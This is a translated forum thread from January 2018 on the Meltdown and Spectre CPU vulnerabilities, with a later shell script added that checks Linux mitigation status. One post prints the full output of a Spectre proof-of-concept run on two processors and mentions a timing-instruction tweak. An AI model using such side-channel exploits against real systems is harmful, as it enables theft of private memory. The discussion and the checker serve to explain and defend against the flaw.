x86 CPU bug: more detailed technical details have leaked

2018-01-04 08:54:56 +08:00
 dndx
https://spectreattack.com/
https://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory-with-side.html

Summary:
Intel and AMD CPUs are affected by the "Meltdown" bug, which allows reading memory across privilege levels; this is the bug that KPTI fixes. AMD is not affected.

The "Spectre" bug affects all AMD, Intel and ARM CPUs; it allows reading the memory of other processes at the same privilege level. There is currently no usable general patch.

In theory any software that uses a JIT compiler may be affected by both bugs, including eBPF, JavaScript V8 and so on.

Chrome has already published a security advisory: https://sites.google.com/a/chromium.org/dev/Home/chromium-security/ssca
A complete fix has to wait for the Chrome 64 stable release.

Working exploits exist for both bugs (including one based on V8 that reads arbitrary memory of the Chrome process), but they have not been released yet.
bigphat
2018-01-04 19:40:46 +08:00
I'm trying to explain this to people of my parents' generation. Can the two bugs be described like this?
If data is money and the storage that holds the data is a bank,
then with Meltdown a hacker can steal the central bank's money held inside the bank,
and with Spectre a hacker can steal money from other people's accounts.
hippies
2018-01-04 21:03:00 +08:00
@jaleo This has nothing to do with whether the chip is "independent and controllable"; an independent and controllable chip can have big bugs just the same, and whoever finds them simply won't tell you.
redsonic
2018-01-04 23:03:42 +08:00
@VYSE Tested on Linux: the newer processors with an invariant TSC are all hit; the old Core 2 raises an illegal instruction at __rdtscp, and after switching to rdtsc it runs, but it is basically not hit. Intel (the toothpaste factory) should be able to fend off Spectre attacks just by adding a switch that makes the TSC a bit fuzzier.

New Celeron, Core i:
# /tmp/spectre-attack
Putting 'The Magic Words are Squeamish Ossifrage.' in memory
Reading 40 bytes:
Reading at malicious_x = 0xffffffffffdfeb98... Success: 0x54='T' score=17 (second best: 0x05 score=6)
Reading at malicious_x = 0xffffffffffdfeb99... Success: 0x68='h' score=17 (second best: 0x05 score=6)
Reading at malicious_x = 0xffffffffffdfeb9a... Success: 0x65='e' score=2
Reading at malicious_x = 0xffffffffffdfeb9b... Success: 0x20=' ' score=2
Reading at malicious_x = 0xffffffffffdfeb9c... Success: 0x4D='M' score=2
Reading at malicious_x = 0xffffffffffdfeb9d... Success: 0x61='a' score=19 (second best: 0x00 score=6)
Reading at malicious_x = 0xffffffffffdfeb9e... Success: 0x67='g' score=2
Reading at malicious_x = 0xffffffffffdfeb9f... Success: 0x69='i' score=2
Reading at malicious_x = 0xffffffffffdfeba0... Success: 0x63='c' score=125 (second best: 0x00 score=61)
Reading at malicious_x = 0xffffffffffdfeba1... Success: 0x20=' ' score=2
Reading at malicious_x = 0xffffffffffdfeba2... Success: 0x57='W' score=2
Reading at malicious_x = 0xffffffffffdfeba3... Success: 0x6F='o' score=2
Reading at malicious_x = 0xffffffffffdfeba4... Success: 0x72='r' score=2
Reading at malicious_x = 0xffffffffffdfeba5... Success: 0x64='d' score=2
Reading at malicious_x = 0xffffffffffdfeba6... Success: 0x73='s' score=2
Reading at malicious_x = 0xffffffffffdfeba7... Success: 0x20=' ' score=97 (second best: 0x05 score=46)
Reading at malicious_x = 0xffffffffffdfeba8... Success: 0x61='a' score=2
Reading at malicious_x = 0xffffffffffdfeba9... Success: 0x72='r' score=2
Reading at malicious_x = 0xffffffffffdfebaa... Success: 0x65='e' score=107 (second best: 0x00 score=50)
Reading at malicious_x = 0xffffffffffdfebab... Success: 0x20=' ' score=2
Reading at malicious_x = 0xffffffffffdfebac... Success: 0x53='S' score=2
Reading at malicious_x = 0xffffffffffdfebad... Success: 0x71='q' score=2
Reading at malicious_x = 0xffffffffffdfebae... Success: 0x75='u' score=2
Reading at malicious_x = 0xffffffffffdfebaf... Success: 0x65='e' score=2
Reading at malicious_x = 0xffffffffffdfebb0... Success: 0x61='a' score=513 (second best: 0x00 score=255)
Reading at malicious_x = 0xffffffffffdfebb1... Success: 0x6D='m' score=2
Reading at malicious_x = 0xffffffffffdfebb2... Success: 0x69='i' score=2
Reading at malicious_x = 0xffffffffffdfebb3... Success: 0x73='s' score=2
Reading at malicious_x = 0xffffffffffdfebb4... Success: 0x68='h' score=13 (second best: 0x00 score=5)
Reading at malicious_x = 0xffffffffffdfebb5... Success: 0x20=' ' score=2
Reading at malicious_x = 0xffffffffffdfebb6... Success: 0x4F='O' score=17 (second best: 0x00 score=7)
Reading at malicious_x = 0xffffffffffdfebb7... Success: 0x73='s' score=2
Reading at malicious_x = 0xffffffffffdfebb8... Success: 0x73='s' score=2
Reading at malicious_x = 0xffffffffffdfebb9... Success: 0x69='i' score=93 (second best: 0x00 score=45)
Reading at malicious_x = 0xffffffffffdfebba... Success: 0x66='f' score=2
Reading at malicious_x = 0xffffffffffdfebbb... Success: 0x72='r' score=2
Reading at malicious_x = 0xffffffffffdfebbc... Success: 0x61='a' score=2
Reading at malicious_x = 0xffffffffffdfebbd... Success: 0x67='g' score=2
Reading at malicious_x = 0xffffffffffdfebbe... Success: 0x65='e' score=2
Reading at malicious_x = 0xffffffffffdfebbf... Success: 0x2E='.' score=251 (second best: 0x00 score=122)

Old Core 2: the result differs on every run because the TSC is inaccurate; this is the run with the most correct guesses:
#./spectre-attack 10
Putting 'The Magic Words are Squeamish Ossifrage.' in memory
Reading 40 bytes:
Reading at malicious_x = 0xffffffffffdfeb78... Success: 0x54='T' score=2
Reading at malicious_x = 0xffffffffffdfeb79... Success: 0x68='h' score=2
Reading at malicious_x = 0xffffffffffdfeb7a... Success: 0x65='e' score=6
Reading at malicious_x = 0xffffffffffdfeb7b... Success: 0x20=' ' score=2
Reading at malicious_x = 0xffffffffffdfeb7c... Success: 0x4D='M' score=1
Reading at malicious_x = 0xffffffffffdfeb7d... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdfeb7e... Success: 0x67='g' score=1
Reading at malicious_x = 0xffffffffffdfeb7f... Success: 0x69='i' score=1
Reading at malicious_x = 0xffffffffffdfeb80... Success: 0x63='c' score=2
Reading at malicious_x = 0xffffffffffdfeb81... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdfeb82... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdfeb83... Success: 0x6F='o' score=1
Reading at malicious_x = 0xffffffffffdfeb84... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdfeb85... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdfeb86... Success: 0x73='s' score=2
Reading at malicious_x = 0xffffffffffdfeb87... Success: 0x66='f' score=1
Reading at malicious_x = 0xffffffffffdfeb88... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdfeb89... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdfeb8a... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdfeb8b... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdfeb8c... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdfeb8d... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdfeb8e... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdfeb8f... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdfeb90... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdfeb91... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdfeb92... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdfeb93... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdfeb94... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdfeb95... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdfeb96... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdfeb97... Success: 0x73='s' score=2
Reading at malicious_x = 0xffffffffffdfeb98... Success: 0x00='?' score=0
Reading at malicious_x = 0xffffffffffdfeb99... Success: 0x69='i' score=2
Reading at malicious_x = 0xffffffffffdfeb9a... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdfeb9b... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdfeb9c... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdfeb9d... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdfeb9e... Success: 0x65='e' score=1
Reading at malicious_x = 0xffffffffffdfeb9f... Success: 0xFF='?' score=0
jaleo
2018-01-04 23:11:22 +08:00
@hippies When it gets found it's called a vulnerability; when it doesn't get found it's called a backdoor. Heaven knows how much the CIA has done with this.
That is exactly why we need independent and controllable chips.
redsonic
2018-01-04 23:25:23 +08:00
@jaleo With an independent and controllable chip you don't even need a backdoor, you just use the front door.
hippies
2018-01-04 23:51:19 +08:00
@jaleo Heaven knows how much this backdoor has helped our country too, and now it has been spoiled like this. Sob.
cppgohan
2018-01-05 00:17:38 +08:00
Linus's reply is really something.

"Maybe even a L1 I$ that is keyed by CPL." I didn't get this one.

lkml.org's G+ share counter is broken..
qfdk
2018-01-05 01:36:09 +08:00
@bigphat Simpler: you bought a new flat, and your own key opens every door in the whole building... The fix is to install a security door. The downside is that you now have to open one more door when you come home, which delays getting in.
mingl0280
2018-01-05 02:38:03 +08:00
After patching, VM performance drops badly (writes down by half, reads down by a third; VM environment only)...
Seriously, fuck Intel...
lsmgeb89
2018-01-05 03:30:47 +08:00
Intel at least has to compensate its customers somehow, otherwise it is just too galling.
fline
2018-01-05 04:13:13 +08:00
I want to know whether the Snapdragon 845 is affected, hahahahaha, it makes me laugh just thinking about it..
lightening
2018-01-05 04:18:56 +08:00
Your first sentence is mistranslated; read it again yourself...
stabc
2018-01-05 04:45:10 +08:00
Can someone explain in plain language: if this "BUG" is left unpatched, in what scenarios could I run into what kind of problems?
farseeraliens
2018-01-05 05:08:38 +08:00
@cppgohan dollar=cash=cache,
I=instruction
What Linus means is that the CPU builds in an instruction cache bucketed by CPL. Even achieving the "make sure..." of the preceding sentence by such a crude method would be fine; once everything is separated by CPL it certainly can't cross privilege levels any more... who knows whether the hardware engineers skipped this because of cost constraints.
mortal
2018-01-05 08:07:32 +08:00
skylancer
2018-01-05 09:27:50 +08:00
@fline If you had read everything the OP posted, you would know the 845 is affected too.
alexyangjie
2018-01-05 10:18:28 +08:00
I wonder whether, if a VPS host is patched but the VM is not, the VM can read other VMs' data.
Loyalsoldier
2018-01-05 10:29:23 +08:00
So which CPU models are affected, exactly? Or which models are not affected?
kaneg
2018-01-05 10:58:58 +08:00
How can I tell whether my system has the patches that fix these issues? For both Windows and Linux.
Ordinary users are just at their mercy.
dndx
2018-01-05 11:17:22 +08:00
@kaneg For Linux, versions after 4.13.11 carry the Meltdown patch.

There is no general patch for Spectre.
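For kaneg's question above about checking whether a Linux box has the fixes, here is an added check script; it is not code from the thread or from any of the linked projects. It assumes a kernel that exposes /sys/devices/system/cpu/vulnerabilities/ and the pti flag in /proc/cpuinfo (mainline 4.15 and later, plus distro backports), and the optional root-directory argument is this script's own convenience so it can be pointed at a test tree.

```shell
#!/bin/sh
# Added example, not from the thread: report the kernel's own view of the
# Meltdown/Spectre mitigation status on Linux. Assumes a kernel that exposes
# /sys/devices/system/cpu/vulnerabilities/ and the "pti" flag in /proc/cpuinfo
# (mainline 4.15+ and distro backports); anything older is reported as unknown,
# never as patched. The optional root argument is for pointing at a test tree.

# Print the raw sysfs status line for one vulnerability, e.g. "Mitigation: PTI".
vuln_status() {
    dir="${1%/}/sys/devices/system/cpu/vulnerabilities"
    if [ -r "$dir/$2" ]; then
        cat "$dir/$2"
    else
        echo "unknown (no $dir/$2: kernel too old or sysfs not mounted)"
    fi
}

# Classify a sysfs status line as patched, vulnerable or unknown.
# Lines like "Vulnerable: Retpoline without IBPB" count as vulnerable.
classify() {
    case "$1" in
        "Not affected"*|"Mitigation:"*) echo patched ;;
        "Vulnerable"*)                  echo vulnerable ;;
        *)                              echo unknown ;;
    esac
}

# KPTI (the kernel-side Meltdown fix) shows up as the "pti" cpuinfo flag.
kpti_active() {
    cpuinfo="${1%/}/proc/cpuinfo"
    [ -r "$cpuinfo" ] && grep -m1 '^flags' "$cpuinfo" | grep -qw pti
}

# Human-readable summary for meltdown, spectre_v1 and spectre_v2.
report() {
    for v in meltdown spectre_v1 spectre_v2; do
        s=$(vuln_status "$1" "$v")
        printf '%-10s %-10s %s\n' "$v" "$(classify "$s")" "$s"
    done
    if kpti_active "$1"; then
        echo "KPTI: enabled (pti flag present)"
    else
        echo "KPTI: not reported (unpatched, non-x86, or kernel predates the flag)"
    fi
}

report "${1:-/}"
```

Run it as root or any user; the sysfs files are world-readable, and "Vulnerable" for spectre_v2 on a kernel of this period is expected, matching dndx's note that there is no general Spectre patch.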


© 2021 V2EX